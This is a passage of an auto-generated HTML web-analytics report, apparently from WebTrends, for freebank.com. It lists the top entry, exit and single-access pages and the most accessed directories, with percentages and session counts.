<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/_private/">http://www.freebank.com/_private/</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.05%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/_fpclass/">http://www.freebank.com/_fpclass/</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.05%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/cos/">http://www.freebank.com/cos/</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.05%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/regstr.asp?bvid=4933">http://www.freebank.com/regstr.asp?bvid=4933</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.06%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD></TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopEntry"><!--Resources Accessed::Top Entry Pages--></A>
<!-- WT_H1>Top Entry Pages</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Top Entry Pages</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the first hit from a user visiting this site. This is most likely the home page but, in some cases, it may also be specific URLs that users enter to access a particular page directly. The percentages refer to the total number of user sessions.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index02.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=4 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>4, .3, 4.1, .8
, .8
</WT_TABLE_STATS -->
<CENTER><B>Top Entry Pages</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Top Entry Pages</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Pages</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>% of Total</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>User Sessions</CENTER></B></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/index.htm">http://www.freebank.com/index.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">53.31%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4179</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/editcat.html">http://www.freebank.com/editcat.html</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.85%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">459</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/acctsum.asp">http://www.freebank.com/acctsum.asp</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.16%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">405</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/editgrp.html">http://www.freebank.com/editgrp.html</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.5%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">353</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/ccrgstr.html">http://www.freebank.com/ccrgstr.html</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.58%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">203</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/newpay.html">http://www.freebank.com/newpay.html</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.84%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">145</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/rgstr.html">http://www.freebank.com/rgstr.html</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.68%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">132</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/xfer.html">http://www.freebank.com/xfer.html</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.56%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">123</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/statemnt.html">http://www.freebank.com/statemnt.html</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.5%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">118</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/pendbills.html">http://www.freebank.com/pendbills.html</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.45%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">114</TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total For the Pages Above</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>79.49%</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>6231</B></TD>
</TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopExit"><!--Resources Accessed::Top Exit Pages--></A>
<!-- WT_H1>Top Exit Pages</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Top Exit Pages</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the pages users were on when they left the site. The percentages refer to the total number of user sessions that started with a valid Document Type. If the session started on a document with a different type (such as a graphic or sound file), the file is not counted as an Entry Page, and the session is not counted in the total.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=4 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>4, .3, 4.1, .8
, .8
</WT_TABLE_STATS -->
<CENTER><B>Top Exit Pages</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Top Exit Pages</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Pages</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>% of Total</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>User Sessions</CENTER></B></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/index.htm">http://www.freebank.com/index.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">38.97%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3054</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/forrest.asp">http://www.freebank.com/forrest.asp</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6.22%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">488</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_bye.htm">http://www.freebank.com/nbf_bye.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.11%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">401</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_essay_gl_01.htm">http://www.freebank.com/nbf_essay_gl_01.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.98%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">391</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_pics.htm">http://www.freebank.com/nbf_pics.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.76%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">373</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_1875-07.htm">http://www.freebank.com/nbf_1875-07.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.51%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">354</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_controversies.htm">http://www.freebank.com/nbf_controversies.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.53%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">199</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_books.htm">http://www.freebank.com/nbf_books.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.05%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">161</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_more.htm">http://www.freebank.com/nbf_more.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.02%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">159</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbfgad.htm">http://www.freebank.com/nbfgad.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.69%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">133</TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total For the Pages Above (only sessions starting on a valid document type are included)</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>72.9%</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>5713</B></TD>
</TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopSinglePage"><!--Resources Accessed::Single Access Pages--></A>
<!-- WT_H1>Single Access Pages</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Single Access Pages</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the pages on the site that visitors access and exit without viewing any other page. The percentages refer to the total number of user sessions that started with a valid Document Type. If the session started on a document with a different type (such as a graphic or sound file), the file is not counted as an Entry Page, and the session is not counted in the total<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index03.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=4 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>4, .3, 4.1, .8
, .8
</WT_TABLE_STATS -->
<CENTER><B>Single Access Pages</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Single Access Pages</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Pages</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>% of Total</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>User Sessions</CENTER></B></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/index.htm">http://www.freebank.com/index.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">50.56%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2937</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_bye.htm">http://www.freebank.com/nbf_bye.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6.21%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">361</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/forrest.asp">http://www.freebank.com/forrest.asp</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.68%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">330</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_1875-07.htm">http://www.freebank.com/nbf_1875-07.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.66%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">271</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_pics.htm">http://www.freebank.com/nbf_pics.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.82%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">164</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_essay_gl_01.htm">http://www.freebank.com/nbf_essay_gl_01.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.94%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">113</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_books.htm">http://www.freebank.com/nbf_books.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.85%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">108</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbfgad.htm">http://www.freebank.com/nbfgad.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.63%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">95</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_controversies.htm">http://www.freebank.com/nbf_controversies.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.61%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">94</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_more.htm">http://www.freebank.com/nbf_more.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.54%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">90</TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total For the Pages Above</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>78.56%</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>4563</B></TD>
</TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopDirectory"><!--Resources Accessed::Most Accessed Directories--></A>
<!-- WT_H1>Most Accessed Directories</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Most Accessed Directories</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section analyzes accesses to the directories of the site. This information can be useful in determining the types of data most often requested.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index04.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=6 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>6, 2.4, .6
, .6
, .8, .8, .8
</WT_TABLE_STATS -->
<CENTER><B>Most Accessed Directories</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Most Accessed Directories</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Path to Directory</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Hits</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>% of Total Hits</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Non Cached %</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Non Cached K Xferred</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>User Sessions</CENTER></B></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><A href="http://www.freebank.com/">http://www.freebank.com/</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">53776</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">85.32%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">88.93%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">735,059K</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10312</TD></TR>
